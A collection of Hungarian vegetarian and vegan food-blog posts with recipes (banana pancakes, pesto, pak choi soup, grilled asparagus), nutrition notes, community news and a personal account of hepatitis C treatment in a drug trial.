majd belőle? Sokféle lehetőség van a gasztronómiától elkezdve az ajándéktárgyakig: – levendulás cukor (egészségesebb változatban természetesen nem cukorral, hanem pl. xilittel vagy eritritollal) – levendula tea – levendula szörp, levendula zselé/lekvár – levendulás keksz – ajtóra dekoráció (levendula koszorú) – párnabetét / párnaalátét (a jó alváshoz) – házi készítésű szappanba (lásd az alábbi linken: http://www.fittnok.hu/szappankeszites-hazilag ) – saját készítésű fürdőgolyóba: http://www.fittnok.hu/furdogolyo-furdobomba-keszitese-hazilag – szoba- illetve szekrényillatosító… kis zsákocskákba varrva, (úgy olvastam, hogy érdemes nem csak a szárított virágot, hanem magát a felaprított levelet és szárat is beletölteni, mert az illatanyaga ennek is magas) – még kisebb textíliákba varrva: illatos nyakbavaló/medál – műgyantába (öntőforma) szórva: medál, fülbevaló, karkötő… egyéb ékszerek …. és még sok-sok minden.
Reggelire fel! - Fehérjedús Banán palacsinta, házi áfonya lekvárral (finomított cukor -, fehér liszt-, és tartósítószer - mentes)
Fehérjedús banán palacsinta, házi áfonya lekvárral (finomított cukor-, fehér liszt-, és tartósítószer - mentes) Milyen gasztroblog az, ahol nem találunk palacsinta recepteket??? Rájöttem, hogy palacsinta témában tartozom nektek, mert nem nagyon láttalak el titeket ötletekkel... Eddig! ;-) Pedig milyen sokféle képpen, változatos ízben, különböző töltelékkel, egészséges alapanyagokból, rendhagyó formákban és más más diétába beilleszthető módon el lehet készíteni ezt az egyszerű édességet, reggelit, vagy akár főételt is! A világ különböző pontjain ünneplik a farsangi szezon lezárásaként az ún. "Pancake Day"-t, azaz a "Palacsinta Nap"-ot. Angliában, Írországban, Amerikában, de még Brazíliában is találkozhatunk ezzel az ünneppel. Ha pedig ennyire szeretik mindenhol a palacsintát, akkor mi se maradhatunk ki belőle! ;-) Fehérjedús banán palacsinta (finomított cukor-, búzalisztmentes) Készíthetjük amerikai stílusban, vastag tésztával megkenősen; holland módon kis pamacsokként mártogatósan (poffertjes); magyar módon, vékony tésztával feltekerősen; rakott palacsintaként, vagy akár palacsinta tortát is építhetünk. Lehet egyszerűen édes, vagy sós, gyümölcsös, vagy fűszeres, de még húsos is. ;-) "túrórudi" zab palacsinta torta Korábban hoztam nektek egy látványos, kakaós-túrós túrórudi zabpalacsinta tortát, most pedig az egyik nagy kedvencünkkel, a banán palacsintával ismertetlek meg titeket. :-) A hagyományos, mindenki által ismert palacsinta tészta nehezen emészthető, tápanyag szempontjából értéktelen, fehér búzalisztet, és gyakran fehér cukrot tartalmaz. Ha szeretnénk tápláló palacsintákat fogyasztani, ismerkedjünk meg néhány reform, diétás, vagy paleo palacsinta recepttel, és ezentúl készítsük inkább emészthetőbb formában őket! Most egy magas fehérje- és rosttartalmú, energiadús, gyorsan elkészíthető, hosszú ideig jóllakottság érzést nyújtó, tápláló reggelinek is tökéletes palacsintát hoztam nektek, melyet gyakran elkészítek, főleg, mikor elutazunk valahová. Tökéletes útravaló! ;-) Fehérjedús banán palacsinta, házi áfonya lekvárral (finomított cukor-, fehér liszt-, és tartósítószer - mentes) Önmagában, melegen és hidegen is nagyon finom a banán palacsinta! :-) De ezúttal házi áfonya lekvárt készítettem mellé, mert itt az allergia időszak, és az áfonya, a magas Kalcium tartalmának köszönhetően csökkenti a bosszantó allergiás tüneteket. Meg egyébként is közeledik az áfonya szezon, amit már úgy vártunk! :-) HOZZÁVALÓK (kb.20 db 7 cm átmérőjű amerikai palacsintához): - 3 db érett banán - 60 g zab (porrá darálva) - 1 ek kókusz olaj - 3 db bio tojás - 1/2 tk szódabikarbóna - kevés zsiradék (kókusz olaj) a sütéshez - - 150 g fekete áfonya - 1 ek útifűmaghéj vagy chia mag - 1 ek tiszta víz Fehérjedús banán palacsinta, házi áfonya lekvárral (finomított cukor-, fehér liszt-, és tartósítószer - mentes) ELKÉSZÍTÉS: Kaptam egy szuper kis palacsinta sütőt, mellyel amerikai palacsintákat süthetek könnyedén, szinte zsiradékmentesen, jópofa "smiley face" formában. Nagyon szeretem! :-) Természetesen jó minőségű teflon palacsinta sütőben is elkészíthetjük a banán palacsintáinkat. Ezesetben a tésztából kanalazzunk kis tenyér méretű plecsniket a palacsintasütőbe, és süssük a megszokott módon. (Egyik oldal aranybarna... megfordít, másik oldal aranybarna). Ne próbáljunk meg ebből a tésztából nagy és vékony, hagyományosan feltekerhető palacsintát készíteni, mert nem fog sikerülni. Ahhoz túl zömök és vastag ez a tészta. Fehérjedús banán palacsinta (finomított cukor-, búzalisztmentes) És akkor nézzük a lassan felszívódó, laktató banán palacsinta tésztánkat. Tegyük az érett banánokat a tojásokkal a turmix gépbe, és turmixoljuk egynemű krémmé. Daráljuk a zabot, zabliszt állagúra. Keverjük össze egy keverő tálban a darált zabot, a banános tojással, a szódabikarbónával, a kókusz olajjal, és hagyjuk állni kb. 10 percet, hogy a zab megszívhassa magát. Melegítsük fel a palacsintasütőnket, kenjük ki kevés zsiradékkal, és közepes hőmérsékleten süssük aranybarnára az amerikai stílusú, vastag palacsintáinkat. Süssük ki az összes tésztát, és akár már fogyaszthatjuk is a finom és puha palacsintáinkat! ;-) Házi áfonya lekvár (finomított cukor-, és tartósítószer - mentes) A cukor- és tartósítószermentes házi áfonya lekvárhoz a megmosott fekete áfonyát turmixoljuk össze 1 evőkanál vízzel, és 1 ek útifűmaghéjjal vagy chia maggal. Tegyük be a hűtőbe egy fél órára és kész is a vitaminban gazdag, cukormentes áfonya lekvárunk. (Ha nincs otthon útifűmaghéj, vagy chia mag, akkor is elkészíthetjük, de akkor kevésbé fog meglekvárosodni az áfonya turmix. Inkább áfonya püré állagot fogunk kapni.) Fehérjedús banán palacsinta, házi áfonya lekvárral (finomított cukor-, fehér liszt-, és tartósítószer - mentes) Energiadús, tápanyagban gazdag palacsintázást kíván nektek a Zöld Avocado! :-)
Miért érdemes csicseriborsót fogyasztani?
2015. június 23. Élj harmóniában
A csicseriborsó nem olyan régen terjedt el Magyarországon, de Ázsiai és mediterrán vidékeken nagyon régóta jelen van. Magas fehérje tartalma miatt nagyon népszerű olyan kultúrákban ahol előnyben részesítik a húsmentes étkezést. Kevés kalóriát tartalmaz. Magas a vitamin és ásványi anyag tartalma (B1, B6 vitamin, folsav, foszfor, magnézium, kálcium, vas, cink). Kiemelkedő rost tartalma hozzájárul az egészséges emésztéshez, megszünteti a székrekedést és segít a bélfalakon lerakódott salakanyagoktól megszabadulni, csökkenti a koleszterinszintet. Cukorbetegek számára is nagyon kedvező a fogyasztása, mert segít normalizálni a vércukorszintet. A csicseriborsó rendszeres fogyasztása elősegíti a nyugodt alvást, mert magas a szerotonin tartalma - amely hozzájárul a megfelelő alváshoz és a jó kedélyállapothoz. Az ájurvéda szerint édes és fanyar ízzel rendelkezik. Csökkenti a Pitta-t és a Kapha-t és növeli a Vatat a szervezetben. A csicseriborsó lisztjét az ájurvédában bőrápolásra is hazsnálják. Főzés előtt célszerű egy éjszakára beáztatni. A megfőtt csicseriborsót felhasználhatod salátákba, zöldséges ételekbe gabonákkal fogyasztva:) Az egyik legkedveltebb belőle készült étel a hummusz. Vegyszermentes, (bio) csicseriborsót használj!
EGY éves a Zöld Avocado vegetáriánus gasztroblog! Kövess minket a Pinteresten is! :-)
Pontosan egy évvel ezelőtt került ki a Zöld Avocado gasztroblogra az első poszt. :-) Ez még csak egy bemutatkozó poszt volt arról, hogy miről is fog szólni a Zöld Avocado?! Érdekes élmény visszaolvasni az egy évvel ezelőtti gondolatokat, terveket, célokat, amik akkor még a jövőbe mutattak, most pedig már valóság... avokádó felirat spárgából Arra gondoltam, hogy mi mással is ünnepelhetném az első születésnapot, mint ínycsiklandó, gusztusos és szép színes képekkel! :-) Szerintem mindenki úgy van a recept keresgéléssel, hogy először a fotókat nézi meg, és csak utána a hozzávalókat. Engem is csak a kép tud megfogni, és aztán a recept tartalma! ;-) Ebből a gondolatból kiindulva regisztráltam a Zöld Avocado-t a Pinteresten is, így most már ott is könnyedén gyűjtögethetitek a Zöld Avocado recepteket. :-) nyers avokádó Ha valaki nem ismerné a Pinterestet, ideje megismerkedni vele. Ez egy óóóóriási közösségi képmegosztó oldal, kép gyűjtő adatbázis, ahol mindenféle fajta témában találhattok kedvetekre való képeket, és információkat. Olyan ez, mint egy nagy parafa tábla az előszobában, amire néha kitűzöl egy-egy cikket, képet, receptet, amit az újságban találtál. A Pinterest is egy nagy online parafatábla, végtelen kapacitással. :-) Választhatunk témákat, és aszerint gyűjtögethetjük az érdeklődésünknek megfelelő képeket, információkat. Pl.: engem a receptek érdekelnek, így receptes "kártyákat" gyűjtögetek a Pinterest táblámon, és amikor csak szükségem van rá, megnézem a gyűjteményemet, mint egy receptkönyvet, és választok. De megteheted ezt például lakberendezéses "kártyákkal", ha épp költözés előtt állsz, vagy akár utazási ötletekkel a nyárra. A lehetőségek korlátlanok. ;-) Sajnos a magyar nyelvű adatbázisa még nem túl nagy, hisz külföldön sokkal népszerűbb, mint Magyarországon. De mivel képes adatbázis, könnyedén használható így is, hiszen a képek, a látvány, minden nyelven ugyanolyan, akárhol is élj a nagyvilágban! :-) Tehát mostantól a Zöld Avocado receptek, több száz másik blog receptjével együtt a Pinteresten is! Csatlakozzatok, kövessetek, nézelődjetek, gyűjtögessetek az online recepttáratokban, és osszátok meg ismerőseitekkel, barátaitokkal az értékesebb ! Jó szórakozást hozzá! :-) avokádó virág Táplálkozz, ne csak étkezz a Zöld Avocado gasztrobloggal! A blog küldetése pedig mit sem változott az elmúlt egy évben! :-) A Zöld Avocado blog azért jött létre, hogy recept ötletekkel segítsem azokat az embereket, akik szívesen ennének több növényi táplálékot, és unják már a hagyományos saláták világát. Azoknak, akik elindultak a hagyományosan étkezők táborából az egészségesen táplálkozók táborába, és jól jön nekik néhány útbaigazítás. Nem átlagos receptek egy átlagos konyhából, átlagos embereknek, az átlagos hétköznapokra! ;-) Köszönöm, hogy velünk voltatok az első évben, és igyekszem a következő évben is sok sok finom, egészséges, könnyen elkészíthető, tápláló étellel kedveskedni nektek! :-) Tartsatok velünk továbbra is - a www.zoldavocado.blogspot.com-on - a Facebook-on a Zöld Avocado csoportban, - a Pinteresten a Zöld Avocado csoportban, - vagy ezen a linken megadott valamelyik recept gyűjtő oldalon keresztül.
Színész és vegán
Ki az, a színész Magyarországon, aki vegán? Nem tudod? Segítek: Fenyő Iván. Fáradtam sétáltam hazafelé a kisebb kerülőúton, amit a fáradtságom ellenére mégis szívesen választottam, megmozgat ugyanis, mivel dimbes-dombos vidéken lakom. Nem is értettem, hogy miért ezt választom egy mozgalmasabb nap után. Nos, mire hazaértem, értelmet kapott értetlen választásom. :) Fenyő Iván jött velem szemben az utcán. Találkoztam én már sok híres és hírhedt emberrel. Évekig dolgoztam olyan helyen, ahol napjában számos ismert személy megfordult. Nem tulajdonítottam különlegességet annak, hogy épp Ő jött velem szembe. Elhagytuk egymást, majd hirtelen leesett, valahol hallottam, hogy ő talán vegetáriánus. Visszafordultam, s megkérdeztem. Vegán. Jött a válasz. Persze meglepődött a szituáción. Nos, személyesen tőle hallottam, elhihetitek, hogy vegán. :) Nem szimplán "marketing-fogás", vagy más... (Ha valaki ebbe a feltételezésbe esne...) FB oldalán ír is róla (azóta kigugliztam): "...A vegansag. Azaz, hogy nem eszel semmilyen allati termeket.. Csoda tiszta erzes..En ezt nyomom most januar ota.. Hihetetlen eros.. Nagyon erzem a valtozast. Ok, fogytam.. Ok, vekonyodok.. De nem koros.. De nem vesztek energiat.. Izmos vagyok. Friss vagyok. Es azt erzem h tiszta(!!) vagyok. Eros. Stabil. Stramm (ahogy Nagyikam mondta volna). Es egyaltalan nem mellesleg meghagyom a barataim eletet." Persze, ha legközelebb nem leszek túl fáradt, jobban körülkérdezem nála a vegánság témát. Már van is a tarsolyomban néhány kérdés... :) Hátha... talán még megfordul a környéken... :) Csentem egy képet a facebook oldaláról, ha valaki nem ismerné őt:
Új vegán futóközösség
A 24 órás vegán futás elsöprő sikerén fölbuzdulva megalakult a Vegán futók Magyarországon Facebook-csoport. A jelenleg 86 tagot számláló csapatban a futással még csak kacérkodóktól a tapasztalt ultrafutókig mindenki megtalálható. A lényeg, hogy vegán légy, és időről időre futócipőt húzz. A többiben segítünk. Téged is szeretettel várnak!
A mi bazsalikom pestonk
2015. május 28. Zizi kalandjai
Rengeteg bazsalikom pesto recept van a neten, ez a mi receptünk, ahogy mi készítjük (természetesen vegán). Ádi annyira szereti, hogy mostanában hetente egyszer készítünk “peto tétát” – ő így mondja. Néhány hete, amikor nekiálltam a bazsalikom pestos tészta készítésének, Ádi nyűgösködött, hogy foglalkozzak vele is, ezért úgy döntöttem, hogy neki adom a bazsalikom levelek letépkedésének feladatát. Ez izgalmas, számára újdonság és bevonom a főzésbe. Egész jól teljesítette a feladatot, persze segítenem kellett neki, hogy tökéletesen le legyenek tépkedve a levelek. Az ebéd elkészült és jól is laktunk. Majd néhány nappal később paradicsom palántákat ültettünk nagy cserepekbe, hogy Ádit kicsit bevezessem a kertészkedés művészetébe. Teljesen izgatott volt, mindent ő akart csinálni természetesen, de végre, ha nagy kupival is a hátunk mögött, elkészültünk. Másnap szellőztetés, erkélyajtó kinyit, én főzőcskézek, egyszer csak arra leszek figyelmes, hogy túl nagy a csend… Felfedeztem Ádit, amint tépkedi a paradicsom palánták leveleit és a földet is pakolja ki a cserepekből. Ááááááááááááá! De hát mit tanítottam neki néhány nappal korábban? A bazsalikomnak lehet a leveleit tépkedni, akkor a paradicsom palántának miért nem? Ezt egy két évesnek elég nehéz elmagyarázni. A lényeg, hogy a palánták megúszták, de az ablakpárkányokon végezték, ott nagyobb biztonságban vannak. Állandóan mozgó modell, nehéz lencsevégre kapni A pesto nálunk többnyire dióval készül, de ha éppen nincsen itthon, akkor mandulával csinálom és száraz serpenyőben kicsit meg is pirítom. A bazsalikomon kívül kerül még bele fokhagyma, só, bors, frissen facsart citromlé és jó minőségű extra szűz olívaolaj. Konyhai robotgépben csinálom, de sok szabadidővel rendelkezők megpróbálhatják mozsárban is pépesre törni. Mi mindig tésztával tálaljuk, de kenhetitek kenyérre is vagy tálalhatjátok tepsiben sült újburgonya mellé is. Vegán bazsalikom pestos tészta Hozzávalók 3 főre: – 1 nagy csokor/cserép bazsalikom, levelei letépkedve – 100 g dió vagy mandula – 100 ml extra szűz olívaolaj – 2 gerezd fokhagyma, megpucolva – 1/2 citrom frissen facsart leve – só, bors – 300 g tészta A diót száraz teflonserpenyőben 5-6 perc alatt pirítsuk meg. Tegyünk fel egy lábasban vizet forralni. A megpirított diót tegyük az aprítógépbe, adjuk hozzá a fokhagyma gerezdeket, bazsalikom leveleket, olívaolajat, citromlevet és ízlés szerint sózzuk, borsozzuk. Dolgoztassuk az aprítógépet addig, amíg teljesen pépes lesz a pesto. Ha szükség van rá, adjunk még hozzá olívaolajat. A tésztát főzzük ki al dente (fogkemény) állagúra a csomagoláson található utasítás szerint. Amikor leszűrjük, tegyünk félre kb. fél deci vizet belőle. A leszűrt tésztát keverjük össze az elkészült pestoval és egy kis tészta főzővízzel hígítsuk, hogy egészen krémes legyen az állaga és jól befedje a tésztát.
Zöldségleves Pak Choi-jal (gluténmentes, laktózmentes, vegán)
Zöldségleves Pak Choi-jal (gluténmentes, laktózmentes, vegán) Nem tudom ti hogy vagytok vele, de mi télen sokkal több levest eszünk, mint nyáron. Valószínűleg az is az oka, hogy nyáron több lédús gyümölcsöt és friss zöldséget fogyasztunk, ezért nincs szükségünk plusz folyadék bevitelre leves formájában. Ez nem azt jelenti, hogy egyáltalán nem kívánjuk a levest, de sokkal ritkábban. A magyarok egyébként is nagy leveses nemzet hírében állnak, összehasonlítva az átlag európai étkezési szokásokkal. Egy magyar menüsor elképzelhetetlen leves nélkül! A hideg időkben főleg tápláló krémleveseket készítek, amik jól felmelegítenek minket. ;-) Tavasszal és nyáron pedig inkább a hagyományos "lé és rágnivaló" leveseket kívánjuk meg. Ma egy ilyen, pak choi leves receptet hoztam, mely valójában egy könnyen és egyszerűen elkészíthető zöldségleves, telis tele értékes zöldségekkel. Egy hűvös nyári estén szívesen kanalazgatunk ehhez hasonló leveseket. És te? Mennyire szereted a leveseket? Pak Choi A pak choi-t, vagy bordáskelt sokszor azonosítják a kínai kellel is, de mára már a pak choi elnevezés a magyar nyelvben is elterjedté vált. A káposztafélék családjába tartozó pak choi Közép-Kelet-Ázsiából származik. Termesztésével több, mint hatezer éve foglalkoznak Kínában. "A kínaiak egyetlen szóval sokféle zöldségre utalhatnak: "choi" (ejtsd:csoj). Pak Choi talán a legismertebb Choi féle, mivel különböző egzotikus szupermarketeken már könnyen beszerezhető. Káposztafélék családjába tartozik, és többféle néven is szokták emlegetni: bok choi, fehér mustár káposzta, ló füle, kínai zeller káposzta. A törzs fehér része édeskés, "ropogós", míg a zötét zöld levelei puhábbak és enyhén kesernyések. Igazán sokoldalú zöldségféle! Stir fry ételekhez felhasználható, vagy párolt vegyes tálakhoz, de önmagában is tálalható, mint egy zöldség-étel. Az íze valahol a káposzta és spenót közé esik. Van egy bébi változata is, ami még édesebb! A bébi pak choi-t néha nyersen is eszik, de a legjobb ha enyhén párolt/gőzölt. A pak choi növény gyakran szimbolizál Kínában jólétet és gazdagságot. A szó fordítása értelmezhető úgy, hogy százféle jóság/vagyon. Kínai új év idején nem véletlenül kerül az ünnepi asztalra!" Forrás: Ízek Kelet London HOZZÁVALÓK: (kb. 8 adaghoz) - 2 l tiszta víz - 4 db bio leves kocka - 1/2 piros pritamin paprika kis kockákra vágva - 1 db lila hagyma 4 részre vágva - 3 db gerezd fokhagyma egészben - 150 g kukorica (nem cukrozott konzerv, vagy fagyasztott) - 1 szál tavaszi hagyma darabokra vágva (kb.1 cm-esek) - 2 db pak choi feldarabolva (kb.6-7 cm-es darabokra) - 1 marék friss petrezselyem - 1 ek világos szójaszósz - 1 db nagyobb sárgarépa vékonyra karikázva - 1 db kisebb fehérrépa - Himalája só, frissen őrölt fekete bors - (opcionálisan pl.: cukkini, brokkoli, zeller, egyéb zöldségek) - 4 "fészek" kínai noodle tészta (gluténmentes) Zöldségleves Pak Choi-jal (gluténmentes, laktózmentes, vegán) ELKÉSZÍTÉS: Tegyük fel a vizet forrni egy nagy lábasban. Mielőtt forrni kezdene szórjuk bele a bio leves kockákat, és sárgarépa karikákat. Forrás után kb. 10 perccel, adjuk hozzá a zöldségeket: paprika, lila hagyma, fokhagyma, kukorica, tavaszi hagyma, petrezselyem, és a pak choi. Közepes lángon, fedő alatt főzzük, amíg a répa el nem kezd puhulni. Max. 30 perc alatt ehetőre puhul a répa is, és még a zöldségek sem főnek szét. A noodle tészták zacskóiban 6-10 db tészta "fészek" található. 1 db noodle fészek kb. 2 főnek elég, ha szeretjük sok tésztával enni a levest. :-) A noodle tésztákat külön főzzük meg, mint a hagyományos tésztákat, kb.8 perc alatt (lásd a tészta csomagoláson). (Fedő alatt, forrásban lévő sós vízben, 1 ek olajjal.) A megfőtt noodle tésztákat csak közvetlen a fogyasztás előtt tegyük a leveses tányérunkba, hogy ne tűnjön el a leves , mert a tészta magába szívhatja a folyadékot. És ennyi! Ilyen egyszerűen elkészíthető ez a leves. Természetesen a zöldségeket a saját ízvilágunk szerint változtathatjuk. Zöldségleves Pak Choi-jal (gluténmentes, laktózmentes, vegán) Tápanyagban gazdag jó étvágyat kívánunk! :-) Megjegyzés: Ma már sokféle noodle tésztát lehet kapni. Létezik teljeskiőrlésű, gluténmentes noodle és rizstésztából is láttam már. Válasszunk kedvünk szerint! ;-)
Grillezett spárga fűszeres olajjal
2015. május 20. Gréta konyhája
Amikor azt mondtam, hogy a paradicsomos spárgás tésztasaláta a kedvenc spárgás ételem, akkor nem mondtam igazat, illetve akkor igaz volt, arra a napra. Ma új kedvencem van, -ami mindig is az volt-, a grillezett spárga. A koranyári grillpartik elengedhetetlen kelléke, akár köretként, de mi, mondjuk szendvicsbe, burgerekbe is szoktuk tenni, sőt a hétvégén isteni gluténmentes meleg tortillába tekertük marinált sült tofuval, citromos joghurt szósszal, salátával. Itthon van kontakt grillünk, amin nemcsak isteni lencseburgereket sütünk, vagy gyorsan összedobunk egy francia pirítóst, hanem csodásan használható mindenféle zöldség grillezésére is, így Pest belvárosában is elérhető a grillparti élmény, természetesen elegendő pozitív attitűddel, és színes képzelőerővel :)) Hozzávalók: 0.5 kg zöldspárga (lehetőleg magyar) fűszeres olaj: 1 dl olívaolaj 3 gerezd fokhagyma préselve 2 tk grill fűszerkeverék tiszta só, bors, vegamix 0.5 dl balzsamecet kedvenc zöldfűszerek, amit éppen megkívánunk (bazsalikom, oregano, petrezselyem, majoránna, zsálya, rozmaring, kakukkfű) A spárgák fás végét levágjuk, folyó víznél megmossuk, és papírtörlőn megszárítjuk. Összekeverjük a fűszeres balzsamos olajat, majd ráöntjük a tálban lévő spárgákra. Összepacsmagoljuk. Ráhelyezzük őket a forró kontakt grillre, és 5 perc alatt készre sütjük. Jó étvágyat!
Egy túlélő őszinte vallomása
2015. május 16. Mindennapi ételeink
Úgy gondoltuk, megosztjuk a blog olvasóival az elmúlt időszak eseményeit, melyek nem várt nehézségeket hoztak számunkra. 34 évesen, boldog feleségként és családanyaként ért sokkolóan, de talán nem teljesen váratlanul a diagnózis: születésemkor fertőzött vért kaptam, így egy, kezelés nélkül könnyen halálos betegséggé váló kórt, a hepatitis C-t ,,rejtegetem magamban. Ráadásul ,,alattomos betegségem - az eltelt sok-sok évnek köszönhetően - eléggé előrehaladott stádiumban került a közelmúltban felfedezésre. 4 fokozatból a 3. végén jártam, amikor idén februárban villámcsapásként ért a diagnózis. Évek óta érzem, hogy nincsen minden rendben. A terhességi toxémiát sem gondoltuk véletlennek (a májértékek ekkor a tízszeresei voltak a referenciatartomány alsó értékének). Jártam több orvosnál, természetgyógyásznál is, mindig megvolt a válasz arra, hogy miért szédülök, ájulok, van sokszor hasmenésem, vagy épp -hetekig-az ellenkezője, ill. fáj a fejem. Hiszen sokat ülök, az egyetemeken túl sokat tanulok, stresszelek, majd: túl sokat dolgozom, éjszakázom; a hasmenés pedig laktózérzékenység miatt lehet. S hogy amióta szoptatok, miért szédülök a nap 24 órájában? (Igen, még fekve is forog a világ.) Biztosan amiatt, mert az 1 éven át éjjel-nappal 1,5 óránkénti szoptatásnál kimerült a szervezetem. Azonban ezek a válaszok nem elégítettek ki, előbb B12, majd vashiányra gyanakodtunk, de minden értékem (a májértékeken kívül) a legnagyobb rendben volt (van). Mígnem költözésünk és a sokadik ájulásom és egész nap kínzó, hányingerig menő fejfájásom után végre alaposabban utána olvastunk és férjemmel úgy döntöttünk, egy fizetős laborban kérünk egy hepatitis C szűrést. Hiszen mindez a tünet akár lehet ennek a kezelés nélkül 20-40 év után halálos betegségé is. Az a hét, amíg vártam az eredményt, örökkévalóságnak tűnt. Szívdobogva, kislányunkkal az ölemben néztem meg végül az e-mailt, amelyben a csatolt szerológiai lelet tartalmazta az alábbi szavakat: ,,Hepatitis C vírus pozitivitás. Keressen fel szakorvosi rendelőt: Nem hagyhattam el magam, férjem csak este ért haza, lányunknak pedig mivel mi jelentjük az oltalmat, biztonságot, úgy éreztem, nem mondhatom meg az első ,,felindultságban, hogy súlyos beteg vagyok. Meg kell gyógyulnom. Vajon ha ez előbb kiderül, férjem engem választ? És belevágunk-e életünk legnagyobb feladatába, a gyermeknevelésbe? - ilyesmi gondolatok cikáztak végig az agyamon. Mindezek Fannusunkra mosolyogva, de könnyeket hullajtva törtek elő belőlem. Egyfelől megrendített a valóság, másfelől megkönnyebbülés is volt, hiszen sok minden kitisztult. Aznap alig vártam, hogy Fanni elkezdje napközbeni alvását és utánaolvassak ennek a betegségnek. Gyógyulási esély: 40-50%. A hagyományos kezelés a 25 évnél régebbi betegnek nagy valószínűséggel nem lesz hatásos. A féléves kezelés hasonló a kemoterápiához, depressziót okozhat azon kívül, hogy kihullik a hajam és jártányi erőm nem lesz. És ráadásul 3000 ember vár évente arra a 400 helyre, akik megkapják a kezelést. Nos, van 4, max.5 évem? Szeretnék a férjem mellett megöregedni, neki még gyermekeket szülni, lányunkat látni felnőni. Miért éppen én? És mi lesz velünk? -fájdalmasan törtek elő ezek a gondolatok belőlem. Gyorsan a beutaló megszerzése után bejelentkeztem Debrecen egyik kórházának hepatológiájára, a másiknál nem lehet időpontot kérni, ki kell várni a rendelést. De éreztem, nincsen időm. Addig keresgéltem (Fanni aznap sokat aludt J ), amíg a Debreceni Klinikán találtam egy e-mail címet, utánaolvastam az orvosnak, nagy szaktekintély, mindenféle tanács tagja, elnöke stb.. Nincs vesztenivalóm, írtam neki. Még aznap megérkezett a válasz: 2 nap múlva keressem fel, fogad a rendelési időn kívül. Debreceni ismerőseim más, szerintük talán emberségesebb szakembert ajánlottak. Én -nem tudom megmagyarázni, miért, de - kitartottam mellette és elmentünk a rendelésre. Beesett arcú, karikás szemű emberek a váróban, közülük sokan élő halottak. Ó, Istenem, erre tartok én is? - hasított belém a kérdés és szorítottam még jobban férjem kezét. A második sokk a kivizsgáláson ért. Bíztam benne, hogy (az ösztönösen májvédő) életmódomnak köszönhetően a betegség nem olyan előrehaladott. Azonban a vizsgálat azt mutatta meg, hogy a májam 70%-a már csak kötőszövet. (Ha nem lennék hosszú évek óta vegetáriánus, vegán, lehet, hogy már nem élnék...) Viszont ami ezután következett, még jobban megdöbbentett: a doktor úr közölte, nem tudom, milyen szerencsés vagyok. És ugyan miért? Hogy még élek? Azért, -mondta-, mert Debrecenben (ahova nemrég költöztünk, most már tudjuk, miért...) most nyitja meg kapuit a Hepatológiai Centrum, ahonnan egy országos gyógyszerkísérletbe keresnek 4 Hepatitis C-s beteget, akik előrehaladott állapotban vannak, de még nem kaptak semmilyen kezelést. És amikor én érkeztem, épp még egy főt kerestek, aki a betegség 3. fázisában tart. Jókor, jó helyen lenni. Isteni gondviselés, csoda. Eddig is istenhívő voltam, de most a bőrömön éreztem a jelenlétét, szeretetét. Sebet és bekötözést. Persze még 1 hónapot várni kellett a töménytelen lecsapolt vér nyomán az eredményre, hogy a bennem lakozó több mint 1.200.000 vírus genotipusa az-e, amit a kísérleti kezeléshez keresnek. ( Ezt a gyógyszert a későbbiekben csak az fogja megkapni, aki már túlvan egy sikertelen kezelésen (amire kb. 5 évet várt), és utána a várólistán rá kerül a sor (ismét kb. 5 év). Nekem tehát ez volt az egyedüli esélyem a túlélésre. Újabb türelempróba. Hihetetlen perceket, majd napokat éltünk át ezután. De biztosak voltunk, hogy bekerülünk a kísérleti kezelésbe, hiszen ezért jöttük Debrecenbe. :-) Így kicsivel több mint egy hónappal azután, hogy a betegségem kiderült, már el is kezdődött a gyógykezelésem. Ez 3 hónapig tart, még egy hónap van hátra. Mellékhatások: szédülés, fejfájás, időszakos hányinger, levertség, fáradékonyság, fejfájás, napallergia - legalábbis ezek jelentkeztek nálam. Mindez a hagyományos kezeléshez képest semmi... Bár a nagyszülők messze laknak, férjem pedig sokat dolgozik, kevésbé ér rá, de hála Istennek eddig nem változott a napi rutinunk. Férjem egyébként amikor csak tud, segít, nagyon szeretem őt ezért is. Meg tudjuk oldani a kéthetente való vérvételre járást, ill. esténként kell két gyógyszert szednem. (A kezelésem összköltsége, amit ajándékként megkaptam: 15 millió Ft.) Megtanultam értékelni a napokat. Nemcsak azért, mert szinte mindennap a végkimerültség küszöbén megyek ágyba. Sokszor nem bírom a tempót Fannival, van olyan is, hogy visszaszámolok, mert annyira gyenge vagyok és szédülök, várom a fürdetést, altatást. De mégis minden nap egy ajándék. Mert mindezekkel együtt, de élhetek. A vírusszámom, olyan agresszív a terápia, hogy előbb 69-re, majd 15-re csökkent, jelenleg 0. December elejéig (eddig tart a megfigyelés, utána indul a regenerálódás és remélem, a tünetek csökkenése és elmúlása is...) sajnos még "visszabújhat" a vírus, elölről kezdődhet az egész. De akkor is nyertem még pár évet, évtizedet. És úgy érzem, jelenleg is teljes életet élek, élünk hiszen túlélő vagyok. A blogon várható majd bejegyzés a májdiétáról, méregtelenítésről stb. Szívesen veszem, ha az olvasók közt hasonlóval küzd valaki, és ezt megírja nekem.
Narancsos édesburgonyás fetás zöld saláta, és Hollandia narancssárgában (gluténmentes)
narancsos édesburgonyás fetás zöld saláta (gluténmentes) Egy kicsit ugyan megkéstem ezzel a hírrel az idei évre, de jövőre még érdekes úti cél lehet azoknak, akik szeretik a szabadtéri mulatságokat, szeretik érezni egy nemzet összetartozását, és sokszínűségét egyszerre. Ahogy már korábban bemutattam, minden év Március 17-én Írország illetve egyéb országok ír közösségei zöldbe öltöznek, és így ünneplik a Szent Patrik napot, a világ minden táján. :-) Azonban nem csak az íreknek van színhez kötött ünnepük. Minden év április utolsó hétvégéjén, Queens day-en (ma már King's day), Hollandia narancssárga színbe borul! Narancssárga dekorációkkal, ételekkel, italokkal, narancssárgára festett hajjal, és ruhákban ünneplik a királynő / király születésnapját. Volt szerencsém mindkét ünnepet testközelből átélni, és hatalmas ereje van annak a szeretetnek, amit ilyenkor lehet érezni az utcákon. Az emberek ítéleteiket és különöbző nézeteiket félretéve ünneplik az országukat, egymást, és a földet, amin élnek. Hálásak, boldogok, és még látványosak is az egyforma színbe öltözött emberek tízezrei. :-) A korábbi királynő nappal ellentétben, a királyi családban történt változások miatt, 2014 óta egy férfi ül a trónon, és azóta a király napját, King's Day-t ünnepelnek Április 27-én a Holland Királyságban. "Koninginnedag (A királynő napja) - Április 30. A királynő napja hivatalosan az anyakirálynő születésnapját hivatott ünnepelni, de a valóságban ez csak egy indok egy hatalmas bulira. Egész Hollandia ünnepel, de különösen a nagy városokban -mint például Amszterdam, Rotterdam és Hága- indul be az élet ilyenkor. A város minden pontján buliba ütközünk, hangosan szól a zene mindenhol, mindenki narancssárgába van öltözve (ez a királyi család színe) szabadtéri koncerteket, előadásokat rendeznek. 